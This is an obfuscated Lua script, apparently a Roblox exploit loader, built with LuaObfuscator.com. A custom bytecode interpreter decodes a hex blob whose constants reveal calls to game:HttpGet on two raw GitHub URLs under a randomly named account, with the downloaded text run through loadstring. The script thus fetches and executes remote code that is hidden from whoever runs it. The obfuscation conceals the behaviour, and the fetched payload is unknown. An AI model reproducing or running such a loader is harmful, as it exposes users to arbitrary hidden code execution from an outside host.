--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v111=v5(v87,v19);v19=nil;return v111;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(2 -(1271 -(226 + 1044))))))%(((12 -9) -1)^(((v33-(878 -(282 + 595))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v88-(v88%(1 + 0)) ;else local v89=(933 -(857 + 74))^(v32-1) ;return (((v31%(v89 + v89))>=v89) and (569 -((484 -(32 + 85)) + 197 + 4))) or (1065 -(68 + 997)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + ((14 -8) -2) ;return (v40 * ((22652013 + 8148103) -14022900)) + (v39 * (65716 -(67 + (449 -336)))) + (v38 * (188 + 68)) + v37 ;end local function v24() local v41=(748 + 204) -(802 + 150) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(7 -4)) then if (v46==0) then if (v45==((1055 -(87 + 968)) -0)) then return v47 * (0 + 0) ;else v46=(2911 -(1789 + 124)) -(915 + 82) ;v44=0 -0 ;end elseif (v46==(5796 -3749)) then return ((v45==((1196 -(745 + 21)) -(44 + 386))) and (v47 * ((1487 -(998 + 488))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(838 + 185) ) * (v44 + (v45/((2 + (0 -0))^(68 -16)))) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1188 -(1069 + 41 + 77) ;end if (v41==((19 -12) -(5 + 0))) then v46=v20(v43,74 -53 ,(158 -88) -39 );v47=((v20(v43,(1482 -(447 + 966)) -37 )==(1 + 0)) and  -(1 + (0 -0))) or (1 -0) ;v41=4 -1 ;end if (v41==((3 -2) + 0)) then v44=1424 -(630 + 793) ;v45=(v20(v43,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(109 -(1 + 76)))) + v42 ;v41=7 -5 ;end end end local function v25(v48) local v49;if  not v48 then local v90=1817 -(1703 + 114) ;while true do if (v90==(0 + 0)) then v48=v23();if (v48==(701 -(376 + 325))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((377 -(85 + 291)) -0) );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91~=(0 -0)) then else local v116=(function() return 0 -0 ;end)();local v117=(function() return;end)();while true do if (v116~=0) then else v117=(function() return 1384 -(746 + 638) ;end)();while true do if (v117==1) then v91=(function() return  #"/";end)();break;end if (v117==(0 + 0)) then v92=(function() return v93();end)();v94=(function() return nil;end)();v117=(function() return 868 -(550 + 317) ;end)();end end break;end end end if (v91== #"\\") then if (v92== #".") then v94=(function() return v93()~=(0 -0) ;end)();elseif (v92==(2 -0)) then v94=(function() return v95();end)();elseif (v92~= #"91(") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();local v103=(function() return;end)();while true do if (v102~=(0 + 0)) then else v103=(function() return 285 -(134 + 151) ;end)();while true do if (v103==(560 -(306 + 254))) then local v121=(function() return 0 + 0 ;end)();while true do if (v121~=(1665 -(970 + 695))) then else v99[v100-#"|" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #".",v57 do FlatIdent_25011,Type,v21,Cons,v24,v25,v58,v68=(function() return v51(FlatIdent_25011,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"gha"]=(function() return v21();end)();for v69= #">",v23() do local v70=(function() return v21();end)();if (v20(v70, #"|", #",")~=0) then else local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107==(1468 -(899 + 568))) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(0 -0)) then local v122=(function() return 1990 -(582 + 1408) ;end)();local v123=(function() return;end)();while true do if (0==v122) then v123=(function() return 0 -0 ;end)();while true do if (v123==(0 -0)) then v110[ #"-19"]=(function() return v22();end)();v110[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"\\") then v110[ #"91("]=(function() return v23();end)();elseif (v108==(7 -5)) then v110[ #"19("]=(function() return v23() -((1826 -(1195 + 629))^(20 -4)) ;end)();elseif (v108== #"-19") then local v178=(function() return 241 -(187 + 54) ;end)();local v179=(function() return;end)();while true do if (v178==(780 -(162 + 618))) then v179=(function() return 0 + 0 ;end)();while true do if (v179==(0 + 0)) then v110[ #"xxx"]=(function() return v23() -(2^(11 + 5)) ;end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v107=(function() return 3 -1 ;end)();end if (v107==2) then if (v20(v109, #"}", #"]")== #"[") then v110[813 -(569 + 242) ]=(function() return v58[v110[5 -3 ]];end)();end if (v20(v109,2 -0 ,1026 -(706 + 318) )== #"/") then v110[ #"asd"]=(function() return v58[v110[ #"19("]];end)();end v107=(function() return 1 + 2 ;end)();end if ((1639 -(1373 + 263))~=v107) then else if (v20(v109, #"-19", #"gha")== #"<") then v110[ #"http"]=(function() return v58[v110[ #"xnxx"]];end)();end v53[v69]=(function() return v110;end)();break;end if ((1000 -(451 + 549))==v107) then local v120=(function() return 0 -0 ;end)();while true do if (v120==1) then v107=(function() return 1;end)();break;end if (v120==0) then v108=(function() return v20(v70,2, #"gha");end)();v109=(function() return v20(v70, #".com",6);end)();v120=(function() return 1 + 0 ;end)();end end end end end end for v71= #"/",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[701 -(271 + 429) ];local v64=v60[2 + 0 ];local v65=v60[1503 -(1408 + 92) ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1087 -(461 + 625) ;local v77= -(1289 -(993 + 295));local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v104=0,v80 do if (v104>=v74) then v78[v104-v74 ]=v79[v104 + (1172 -(418 + 753)) ];else v82[v104]=v79[v104 + 1 + 0 ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 ];if (v85<=(3 + 6)) then if (v85<=((9 -7) + 2)) then if ((1812<=3249) and (v85<=1)) then if ((1623<=1957) and (v85==0)) then local v128=529 -(406 + 123) ;local v129;local v130;while true do if (v128==(1769 -(1749 + 20))) then v129=v84[1 + 1 ];v130=v82[v84[3]];v128=1323 -(1249 + 73) ;end if (v128==(1 + 0)) then v82[v129 + (1146 -(466 + 679)) ]=v130;v82[v129]=v130[v84[9 -5 ]];break;end end else for v149=v84[5 -3 ],v84[1903 -(24 + 82 + 1794) ] do v82[v149]=nil;end end elseif (v85<=2) then for v151=v84[1 + 1 ],v84[1 + 2 ] do v82[v151]=nil;end elseif (v85==(8 -5)) then v82[v84[5 -3 ]]=v84[3];else v82[v84[2]]=v84[3];end elseif ((4412==4412) and (v85<=(120 -(4 + 110)))) then if (v85==(589 -(57 + 527))) then v82[v84[(2406 -(553 + 424)) -(41 + 1386) ]]=v62[v84[106 -(17 + 86) ]];else v82[v84[2]]=v62[v84[3 + 0 ]];end elseif ((1750>=842) and (v85<=(14 -7))) then if (v82[v84[5 -3 ]]==v84[170 -(122 + 44) ]) then v76=v76 + (1 -0) ;else v76=v84[9 -6 ];end elseif ((4372>1850) and (v85>(7 + 1))) then v82[v84[2]]();else local v162=v84[2];local v163=v82[v84[3]];v82[v162 + 1 ]=v163;v82[v162]=v163[v84[(1 -0) + 3 + 0 ]];end elseif ((232<821) and (v85<=(27 -(13 + 0)))) then if ((518<902) and (v85<=(76 -(30 + 35)))) then if (v85>(7 + 2 + 1)) then local v135=v84[2];v82[v135]=v82[v135](v13(v82,v135 + (1258 -(1043 + 214)) ,v77));elseif ((2994>858) and (v82[v84[7 -5 ]]==v84[1216 -(323 + 378 + 511) ])) then v76=v76 + (2 -1) ;else v76=v84[2 + 1 ];end elseif ((v85<=(592 -(361 + 219))) or (3755<=915)) then local v137=320 -(53 + 267) ;local v138;local v139;local v140;local v141;while true do if (v137==(1 + 1)) then for v180=v138,v77 do local v181=(895 -482) -(15 + 398) ;while true do if (v181==(982 -(18 + (2685 -1721)))) then v141=v141 + (3 -2) ;v82[v180]=v139[v141];break;end end end break;end if (v137==(0 + 0)) then v138=v84[2 + 0 ];v139,v140=v75(v82[v138](v13(v82,v138 + (2 -1) ,v84[(249 + 604) -(20 + 830) ])));v137=1 + 0 ;end if ((127 -(116 + 10))==v137) then v77=(v140 + v138) -(1 + 0) ;v141=0;v137=740 -((2619 -2077) + 196) ;end end elseif ((3946>3743) and (v85==(27 -(767 -(239 + 514))))) then v82[v84[1 + 1 ]]();else do return;end end elseif ((v85<=16) or (1335>=3306)) then if (v85>(8 + 3 + 4)) then do return;end else local v142=v84[1 + (1330 -(797 + 532)) ];local v143,v144=v75(v82[v142](v13(v82,v142 + (2 -1) ,v84[(6 + 1) -4 ])));v77=(v144 + v142) -(1552 -(1126 + 425)) ;local v145=405 -(118 + 287) ;for v153=v142,v77 do v145=v145 + 1 ;v82[v153]=v143[v145];end end elseif ((4844>2253) and (v85<=(66 -49))) then local v146=v84[2];v82[v146]=v82[v146](v13(v82,v146 + ((379 + 743) -((277 -159) + 1003)) ,v77));elseif (v85==18) then v76=v84[3];else v76=v84[8 -5 ];end v76=v76 + (378 -(142 + 235)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574038D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C61646B79707570732Q672F4733326F6169336269616E337031707533793379337968776C6F61677870766C6D61626D736475697167716978622F726566732F68656164732F6D61696E2F416168736B656C776B7762656266627563696E66337665693262772E747874033D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C61646B79707570732Q672F336234632F6D61696E2F34633362001A3Q0012043Q00014Q0001000100013Q00260A3Q0002000100010004133Q00020001001204000100013Q00260A00010005000100010004133Q00050001001205000200023Q001205000300033Q002008000300030004001204000500054Q000C000300054Q001100023Q00022Q000D000200010001001205000200023Q001205000300033Q002008000300030004001204000500064Q000C000300054Q001100023Q00022Q000D0002000100010004133Q001900010004133Q000500010004133Q001900010004133Q000200012Q00103Q00017Q00",v9(),...);
